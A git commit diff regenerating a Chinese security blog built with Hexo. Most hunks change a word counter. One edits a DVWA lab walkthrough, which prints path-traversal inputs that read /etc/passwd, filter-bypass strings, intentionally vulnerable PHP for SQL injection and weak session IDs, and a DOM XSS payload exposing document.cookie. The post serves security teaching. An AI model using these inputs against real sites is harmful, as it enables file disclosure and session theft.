From 8eeaf683b84d6002824aa603867e9c24ef15479a Mon Sep 17 00:00:00 2001
From: Cool-Y <1072916769@qq.com>
Date: Wed, 24 Jul 2019 14:01:50 +0800
Subject: [PATCH] Site updated: 2019-07-24 14:01:34

---
 2000/01/01/hello-world/index.html             |  2 +-
 .../BIBA访问控制模型实现(python)/index.html   |  2 +-
 2018/12/15/miio-control/index.html            |  2 +-
 2018/12/23/基于规则引擎发现IOT设备/index.html |  2 +-
 2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html |  2 +-
 .../wifi半双工侧信道攻击学习笔记/index.html   |  2 +-
 2019/02/22/qq数据库的加密解密/index.html      |  2 +-
 2019/03/16/小米固件工具mkxqimage/index.html   |  2 +-
 2019/03/23/auto-send-WX/index.html            |  2 +-
 2019/03/25/Samba-CVE/index.html               |  2 +-
 2019/03/28/逆向工程实验/index.html            |  2 +-
 2019/04/15/Caving-db-storage/index.html       |  2 +-
 2019/04/21/XIAOMI-UPnP/index.html             |  2 +-
 2019/05/13/PE-file/index.html                 |  2 +-
 2019/05/14/pack-and-unpack/index.html         |  2 +-
 2019/07/01/AFL-first-learn/index.html         |  2 +-
 2019/07/09/afl-first-try/index.html           |  2 +-
 2019/07/10/x86basic/index.html                |  2 +-
 2019/07/16/linux-pwn-32/index.html            |  2 +-
 2019/07/24/web-dvwa/index.html                | 58 +++++++------------
 2019/07/24/获取固件/index.html                |  8 +--
 about/index.html                              |  2 +-
 archives/2000/01/index.html                   |  2 +-
 archives/2000/index.html                      |  2 +-
 archives/2018/11/index.html                   |  2 +-
 archives/2018/12/index.html                   |  2 +-
 archives/2018/index.html                      |  2 +-
 archives/2019/01/index.html                   |  2 +-
 archives/2019/02/index.html                   |  2 +-
 archives/2019/03/index.html                   |  2 +-
 archives/2019/04/index.html                   |  2 +-
 archives/2019/05/index.html                   |  2 +-
 archives/2019/07/index.html                   |  2 +-
 archives/2019/index.html                      |  2 +-
 archives/2019/page/2/index.html               |  2 +-
 archives/index.html                           |  2 +-
 archives/page/2/index.html                    |  2 +-
 archives/page/3/index.html                    |  2 +-
 bookmarks/index.html                          |  2 +-
 categories/IOT/index.html                     | 28 ++++++++-
 categories/Pwn二进制漏洞/index.html           |  2 +-
 categories/index.html                         |  4 +-
 categories/web/index.html                     |  2 +-
 categories/二进制/index.html                  |  2 +-
 categories/加密解密/index.html                |  2 +-
 categories/杂七杂八/index.html                |  2 +-
 categories/理论学习/index.html                |  2 +-
 categories/顶会论文/index.html                |  2 +-
 index.html                                    |  6 +-
 page/2/index.html                             |  2 +-
 page/3/index.html                             |  2 +-
 search.xml                                    |  4 +-
 sitemap.xml                                   |  4 +-
 tags/AFL/index.html                           |  2 +-
 tags/CVE/index.html                           |  2 +-
 tags/IoT/index.html                           |  2 +-
 tags/MiniUPnP/index.html                      |  2 +-
 tags/PE/index.html                            |  2 +-
 tags/QQ/index.html                            |  2 +-
 tags/SSH/index.html                           |  2 +-
 tags/Samba/index.html                         |  2 +-
 tags/TCPDUMP/index.html                       |  2 +-
 tags/USENIX/index.html                        |  2 +-
 tags/Windows/index.html                       |  2 +-
 tags/ctf/index.html                           |  2 +-
 tags/index.html                               |  2 +-
 tags/itchat/index.html                        |  2 +-
 tags/linux/index.html                         |  2 +-
 tags/miio/index.html                          |  2 +-
 tags/pwn/index.html                           |  2 +-
 tags/python/index.html                        |  2 +-
 tags/web/index.html                           |  2 +-
 tags/wifi/index.html                          |  2 +-
 tags/中间人/index.html                        |  2 +-
 tags/二进制/index.html                        |  2 +-
 tags/侧信道攻击/index.html                    |  2 +-
 tags/取证/index.html                          |  2 +-
 tags/复原文件/index.html                      |  2 +-
 tags/密码/index.html                          |  2 +-
 tags/小米/index.html                          |  2 +-
 tags/微信/index.html                          |  2 +-
 tags/拒绝服务攻击/index.html                  |  2 +-
 tags/数据库/index.html                        |  2 +-
 tags/数据挖掘/index.html                      |  2 +-
 tags/文件格式/index.html                      |  2 +-
 tags/栈溢出/index.html                        |  2 +-
 tags/模型实现/index.html                      |  2 +-
 tags/模糊测试/index.html                      |  2 +-
 tags/漏洞/index.html                          |  2 +-
 tags/破解/index.html                          |  2 +-
 tags/硬件层/index.html                        |  2 +-
 tags/自然语言处理/index.html                  |  2 +-
 tags/访问控制/index.html                      |  2 +-
 tags/路由器/index.html                        |  2 +-
 tags/远程执行/index.html                      |  2 +-
 tags/逆向/index.html                          |  2 +-
 tags/重放攻击/index.html                      |  2 +-
 97 files changed, 152 insertions(+), 140 deletions(-)

diff --git a/2000/01/01/hello-world/index.html b/2000/01/01/hello-world/index.html
index d4f9726a..ed3f6985 100644
--- a/2000/01/01/hello-world/index.html
+++ b/2000/01/01/hello-world/index.html
@@ -641,7 +641,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2018/11/16/BIBA访问控制模型实现(python)/index.html b/2018/11/16/BIBA访问控制模型实现(python)/index.html
index 428575a7..20f6f45b 100644
--- a/2018/11/16/BIBA访问控制模型实现(python)/index.html
+++ b/2018/11/16/BIBA访问控制模型实现(python)/index.html
@@ -829,7 +829,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2018/12/15/miio-control/index.html b/2018/12/15/miio-control/index.html
index 0e446f2d..39858114 100644
--- a/2018/12/15/miio-control/index.html
+++ b/2018/12/15/miio-control/index.html
@@ -731,7 +731,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2018/12/23/基于规则引擎发现IOT设备/index.html b/2018/12/23/基于规则引擎发现IOT设备/index.html
index 8691da0b..d7e69853 100644
--- a/2018/12/23/基于规则引擎发现IOT设备/index.html
+++ b/2018/12/23/基于规则引擎发现IOT设备/index.html
@@ -731,7 +731,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
index 50bc1ec7..b31e872d 100644
--- a/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
+++ b/2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
@@ -736,7 +736,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
index dc086295..709fe8ce 100644
--- a/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
+++ b/2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
@@ -859,7 +859,7 @@ Server   -------wire----------|
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/02/22/qq数据库的加密解密/index.html b/2019/02/22/qq数据库的加密解密/index.html
index 749c4eff..015ade3c 100644
--- a/2019/02/22/qq数据库的加密解密/index.html
+++ b/2019/02/22/qq数据库的加密解密/index.html
@@ -708,7 +708,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/03/16/小米固件工具mkxqimage/index.html b/2019/03/16/小米固件工具mkxqimage/index.html
index f29cecfd..1984e2eb 100644
--- a/2019/03/16/小米固件工具mkxqimage/index.html
+++ b/2019/03/16/小米固件工具mkxqimage/index.html
@@ -715,7 +715,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/03/23/auto-send-WX/index.html b/2019/03/23/auto-send-WX/index.html
index c2975609..45187f35 100644
--- a/2019/03/23/auto-send-WX/index.html
+++ b/2019/03/23/auto-send-WX/index.html
@@ -725,7 +725,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/03/25/Samba-CVE/index.html b/2019/03/25/Samba-CVE/index.html
index fbf5af73..1c22f8d3 100644
--- a/2019/03/25/Samba-CVE/index.html
+++ b/2019/03/25/Samba-CVE/index.html
@@ -750,7 +750,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/03/28/逆向工程实验/index.html b/2019/03/28/逆向工程实验/index.html
index 7ad4b893..68203cc7 100644
--- a/2019/03/28/逆向工程实验/index.html
+++ b/2019/03/28/逆向工程实验/index.html
@@ -853,7 +853,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/04/15/Caving-db-storage/index.html b/2019/04/15/Caving-db-storage/index.html
index be504c2f..d27bae10 100644
--- a/2019/04/15/Caving-db-storage/index.html
+++ b/2019/04/15/Caving-db-storage/index.html
@@ -774,7 +774,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/04/21/XIAOMI-UPnP/index.html b/2019/04/21/XIAOMI-UPnP/index.html
index ede2b12b..01bda33a 100644
--- a/2019/04/21/XIAOMI-UPnP/index.html
+++ b/2019/04/21/XIAOMI-UPnP/index.html
@@ -898,7 +898,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/05/13/PE-file/index.html b/2019/05/13/PE-file/index.html
index d37a041c..f6c40986 100644
--- a/2019/05/13/PE-file/index.html
+++ b/2019/05/13/PE-file/index.html
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/05/14/pack-and-unpack/index.html b/2019/05/14/pack-and-unpack/index.html
index cce645d8..6c1e10f9 100644
--- a/2019/05/14/pack-and-unpack/index.html
+++ b/2019/05/14/pack-and-unpack/index.html
@@ -739,7 +739,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/07/01/AFL-first-learn/index.html b/2019/07/01/AFL-first-learn/index.html
index d835d875..db492a9c 100644
--- a/2019/07/01/AFL-first-learn/index.html
+++ b/2019/07/01/AFL-first-learn/index.html
@@ -1012,7 +1012,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/07/09/afl-first-try/index.html b/2019/07/09/afl-first-try/index.html
index 465d2fb7..7cb1de53 100644
--- a/2019/07/09/afl-first-try/index.html
+++ b/2019/07/09/afl-first-try/index.html
@@ -802,7 +802,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/07/10/x86basic/index.html b/2019/07/10/x86basic/index.html
index dc40a90d..c6fe2a2a 100644
--- a/2019/07/10/x86basic/index.html
+++ b/2019/07/10/x86basic/index.html
@@ -834,7 +834,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/07/16/linux-pwn-32/index.html b/2019/07/16/linux-pwn-32/index.html
index a9ed035c..fda9dac3 100644
--- a/2019/07/16/linux-pwn-32/index.html
+++ b/2019/07/16/linux-pwn-32/index.html
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/2019/07/24/web-dvwa/index.html b/2019/07/24/web-dvwa/index.html
index e750fe40..b3f41876 100644
--- a/2019/07/24/web-dvwa/index.html
+++ b/2019/07/24/web-dvwa/index.html
@@ -87,7 +87,7 @@
 <meta property="og:site_name" content="混元霹雳手">
 <meta property="og:description" content="搭建环境最好使用docker来搭建，方便迁移 https://hub.docker.com/r/vulnerables/web-dvwa/ 暴力破解easy模式 密码破解是从存储在计算机系统中或由计算机系统传输的数据中恢复密码的过程。一种常见的方法是反复尝试密码的猜测。用户经常选择弱密码。不安全选择的例子包括在词典中找到的单个单词，姓氏，任何太短的密码（通常被认为少于6或7个字符），或可预测的模式">
 <meta property="og:locale" content="zh-Hans">
-<meta property="og:updated_time" content="2019-07-24T03:48:23.821Z">
+<meta property="og:updated_time" content="2019-07-24T06:00:56.862Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="DVWA黑客攻防平台">
 <meta name="twitter:description" content="搭建环境最好使用docker来搭建，方便迁移 https://hub.docker.com/r/vulnerables/web-dvwa/ 暴力破解easy模式 密码破解是从存储在计算机系统中或由计算机系统传输的数据中恢复密码的过程。一种常见的方法是反复尝试密码的猜测。用户经常选择弱密码。不安全选择的例子包括在词典中找到的单个单词，姓氏，任何太短的密码（通常被认为少于6或7个字符），或可预测的模式">
@@ -481,18 +481,14 @@
 <h2 id="medium模式-2"><a href="#medium模式-2" class="headerlink" title="medium模式"></a>medium模式</h2><p>检查 HTTP_REFERER（http包头的Referer参数的值，表示来源地址）中是否包含SERVER_NAME（http包头的Host参数，及要访问的主机名，）<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">// Checks to see where the request came from</span><br><span class="line">    if( stripos( $_SERVER[ &apos;HTTP_REFERER&apos; ] ,$_SERVER[ &apos;SERVER_NAME&apos; ]) !== false ) &#123;</span><br></pre></td></tr></table></figure></p>
 <p>想要通过验证，就必须保证在http请求中Referer字段中必须包含Host<br>我们这需要把上面的攻击页面名字改成包含host就可以了。(把攻击页面放在服务器上)</p>
 <h1 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h1><h2 id="easy模式-3"><a href="#easy模式-3" class="headerlink" title="easy模式"></a>easy模式</h2><p>某些Web应用程序允许用户指定直接用于文件流的输入，或允许用户将文件上载到服务器。稍后，Web应用程序访问Web应用程序上下文中的用户提供的输入。通过这样做，Web应用程序允许潜在的恶意文件执行。<br>如果选择要包含的文件在目标计算机上是本地的，则称为“本地文件包含（LFI）。但是文件也可以包含在其他计算机上，然后攻击是”远程文件包含（RFI）。<br>当RFI不是一种选择时。使用LFI的另一个漏洞（例如文件上传和目录遍历）通常可以达到同样的效果。<br>注意，术语“文件包含”与“任意文件访问”或“文件公开”不同。<br>只使用文件包含来阅读’../hackable/flags/fi.php’中的所有五个着名引号。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">// The page we wish to display</span><br><span class="line">$file = $_GET[ &apos;page&apos; ];</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
-<p>文件包含漏洞的一般特征如下：</p>
-<p>?page=a.php</p>
-<p>?home=a.html</p>
-<p>?file=content</p>
-<p>几种经典的测试方法：</p>
-<p>?file=../../../../../etc/passwdd<br>?page=file:///etc/passwd<br>?home=main.cgi<br>?page=<a href="http://www.a.com/1.php" target="_blank" rel="noopener">http://www.a.com/1.php</a><br>=<a href="http://1.1.1.1/../../../../dir/file.txt" target="_blank" rel="noopener">http://1.1.1.1/../../../../dir/file.txt</a><br>（通过多个../可以让目录回到根目录中然后再进入目标目录）</p>
+<p>文件包含漏洞的一般特征如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?page=a.php</span><br><span class="line"></span><br><span class="line">?home=a.html</span><br><span class="line"></span><br><span class="line">?file=content</span><br></pre></td></tr></table></figure></p>
+<p>几种经典的测试方法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">?file=../../../../../etc/passwdd</span><br><span class="line">?page=file:///etc/passwd</span><br><span class="line">?home=main.cgi</span><br><span class="line">?page=http://www.a.com/1.php</span><br><span class="line">=http://1.1.1.1/../../../../dir/file.txt</span><br><span class="line">（通过多个../可以让目录回到根目录中然后再进入目标目录）</span><br></pre></td></tr></table></figure></p>
 <h2 id="medium模式-3"><a href="#medium模式-3" class="headerlink" title="medium模式"></a>medium模式</h2><p>增加对绝对路径http和相对路径的检查<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// Input validation</span><br><span class="line">$file = str_replace( array( &quot;http://&quot;, &quot;https://&quot; ), &quot;&quot;, $file );</span><br><span class="line">$file = str_replace( array( &quot;../&quot;, &quot;..\&quot;&quot; ), &quot;&quot;, $file );</span><br></pre></td></tr></table></figure></p>
 <p>但依然可以使用?page=file:///etc/passwd<br>以及重复字符过滤方法,构造url</p>
 <ol>
-<li>构造url为httphttp://  –&gt; http</li>
-<li>构造url为httphttp://://  –&gt;http://</li>
-<li>构造url为…/./   –&gt;  ../</li>
+<li>构造url为   httphttp://  –&gt; http</li>
+<li>构造url为   httphttp://://  –&gt;http://</li>
+<li>构造url为   …/./   –&gt;  ../</li>
 </ol>
 <h1 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h1><h2 id="easy模式-4"><a href="#easy模式-4" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
 <p>上传的文件对Web应用程序构成重大风险。许多攻击的第一步是将一些代码提供给系统进行攻击。然后攻击者只需要找到一种方法来执行代码。使用文件上传有助于攻击者完成第一步。<br>不受限制的文件上载的后果可能会有所不同，包括完整的系统接管，过载的文件系统，向后端系统转发攻击以及简单的污损。这取决于应用程序对上传文件的作用，包括存储位置。<br>由于此文件上载漏洞，请在目标系统上执行您选择的任何PHP函数（例如phpinfo（）或system（））。</p>
@@ -513,11 +509,11 @@
 <h1 id="SQL盲注"><a href="#SQL盲注" class="headerlink" title="SQL盲注"></a>SQL盲注</h1><blockquote>
 <p>盲注，与一般注入的区别在于，一般的注入攻击者可以直接从页面上看到注入语句的执行结果，而盲注时攻击者通常是无法从显示页面上获取执行结果，甚至连注入语句是否执行都无从得知，因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。<br>1.判断是否存在注入，注入是字符型还是数字型<br>2.猜解当前数据库名<br>3.猜解数据库中的表名<br>4.猜解表中的字段名<br>5.猜解数据</p>
 </blockquote>
-<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">if( isset( $_GET[ &apos;Submit&apos; ] ) ) &#123;</span><br><span class="line">    // Get input</span><br><span class="line">    $id = $_GET[ &apos;id&apos; ];</span><br><span class="line"></span><br><span class="line">    // Check database</span><br><span class="line">    $getid  = &quot;SELECT first_name, last_name FROM users WHERE user_id = &apos;$id&apos;;&quot;;</span><br><span class="line">    $result = mysqli_query($GLOBALS[&quot;___mysqli_ston&quot;],  $getid ); // Removed &apos;or die&apos; to suppress mysql errors</span><br><span class="line"></span><br><span class="line">    // Get results</span><br><span class="line">    $num = @mysqli_num_rows( $result ); // The &apos;@&apos; character suppresses errors</span><br><span class="line">    if( $num &gt; 0 ) &#123;</span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &apos;&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    else &#123;</span><br><span class="line">        // User wasn&apos;t found, so the page wasn&apos;t!</span><br><span class="line">        header( $_SERVER[ &apos;SERVER_PROTOCOL&apos; ] . &apos; 404 Not Found&apos; );</span><br><span class="line"></span><br><span class="line">        // Feedback for end user</span><br><span class="line">        echo &apos;&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;&apos;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ((is_null($___mysqli_res = mysqli_close($GLOBALS[&quot;___mysqli_ston&quot;]))) ? false : $___mysqli_res);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
+<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( $_GET[ <span class="string">'Submit'</span> ] ) ) &#123;</span><br><span class="line">    <span class="comment">// Get input</span></span><br><span class="line">    $id = $_GET[ <span class="string">'id'</span> ];</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Check database</span></span><br><span class="line">    $getid  = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '$id';"</span>;</span><br><span class="line">    $result = mysqli_query($GLOBALS[<span class="string">"___mysqli_ston"</span>],  $getid ); <span class="comment">// Removed 'or die' to suppress mysql errors</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Get results</span></span><br><span class="line">    $num = @mysqli_num_rows( $result ); <span class="comment">// The '@' character suppresses errors</span></span><br><span class="line">    <span class="keyword">if</span>( $num &gt; <span class="number">0</span> ) &#123;</span><br><span class="line">        <span class="comment">// Feedback for end user</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;User ID exists in the database.&lt;/pre&gt;'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// User wasn't found, so the page wasn't!</span></span><br><span class="line">        header( $_SERVER[ <span class="string">'SERVER_PROTOCOL'</span> ] . <span class="string">' 404 Not Found'</span> );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Feedback for end user</span></span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;pre&gt;User ID is MISSING from the database.&lt;/pre&gt;'</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    ((is_null($___mysqli_res = mysqli_close($GLOBALS[<span class="string">"___mysqli_ston"</span>]))) ? <span class="keyword">false</span> : $___mysqli_res);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
 <p>查看源码发现还是没有对id做过滤，但是它不会返回错误信息，只会告诉你User ID exists in the database.以及User ID is MISSING from the database.</p>
 <p>盲注分为基于布尔的盲注、基于时间的盲注以及基于报错的盲注。<br>如果手工盲注的话，需要对sql语法相当熟悉。类似：<br><a href="https://www.freebuf.com/articles/web/120985.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/120985.html</a><br>如果自动盲注的话，可以使用sqlmap来完成，类似：<br><a href="https://www.jianshu.com/p/ec2ca79e74b2" target="_blank" rel="noopener">https://www.jianshu.com/p/ec2ca79e74b2</a></p>
 <h1 id="弱session-id"><a href="#弱session-id" class="headerlink" title="弱session-id"></a>弱session-id</h1><h2 id="easy模式-6"><a href="#easy模式-6" class="headerlink" title="easy模式"></a>easy模式</h2><p>session-ID通常是在登录后作为特定用户访问站点所需的唯一内容，如果能够计算或轻易猜到该会话ID，则攻击者将有一种简单的方法来获取访问权限。无需知道账户密码或查找其他漏洞，如跨站点脚本。</p>
-<p>根据源码可以看出来session每次加1<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$html = &quot;&quot;;</span><br><span class="line"></span><br><span class="line">if ($_SERVER[&apos;REQUEST_METHOD&apos;] == &quot;POST&quot;) &#123;</span><br><span class="line">    if (!isset ($_SESSION[&apos;last_session_id&apos;])) &#123;</span><br><span class="line">        $_SESSION[&apos;last_session_id&apos;] = 0;</span><br><span class="line">    &#125;</span><br><span class="line">    $_SESSION[&apos;last_session_id&apos;]++;</span><br><span class="line">    $cookie_value = $_SESSION[&apos;last_session_id&apos;];</span><br><span class="line">    setcookie(&quot;dvwaSession&quot;, $cookie_value);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
+<p>根据源码可以看出来session每次加1<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">$html = <span class="string">""</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ($_SERVER[<span class="string">'REQUEST_METHOD'</span>] == <span class="string">"POST"</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span> ($_SESSION[<span class="string">'last_session_id'</span>])) &#123;</span><br><span class="line">        $_SESSION[<span class="string">'last_session_id'</span>] = <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    $_SESSION[<span class="string">'last_session_id'</span>]++;</span><br><span class="line">    $cookie_value = $_SESSION[<span class="string">'last_session_id'</span>];</span><br><span class="line">    setcookie(<span class="string">"dvwaSession"</span>, $cookie_value);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
 <p>按f12看application-cookies也能发现这个规律。<br>然后使用hackbar这个扩展程序攻击。</p>
 <h2 id="medium模式-6"><a href="#medium模式-6" class="headerlink" title="medium模式"></a>medium模式</h2><p>从源码中可以看到dvwaSession就是时间戳<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$html = &quot;&quot;;</span><br><span class="line"></span><br><span class="line">if ($_SERVER[&apos;REQUEST_METHOD&apos;] == &quot;POST&quot;) &#123;</span><br><span class="line">    $cookie_value = time();</span><br><span class="line">    setcookie(&quot;dvwaSession&quot;, $cookie_value);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
 <h1 id="基于DOM的XSS"><a href="#基于DOM的XSS" class="headerlink" title="基于DOM的XSS"></a>基于DOM的XSS</h1><h2 id="easy模式-7"><a href="#easy模式-7" class="headerlink" title="easy模式"></a>easy模式</h2><blockquote>
@@ -537,38 +533,28 @@
 <p>绕过有两种方式</p>
 <ol>
 <li>方式1<br>url中有一个字符为#，该字符后的数据不会发送到服务器端，从而绕过服务端过滤<br><code>http://192.168.31.84:81/vulnerabilities/xss_d/?default=English#&lt;script&gt;alert(document.cookie)&lt;/script&gt;</code></li>
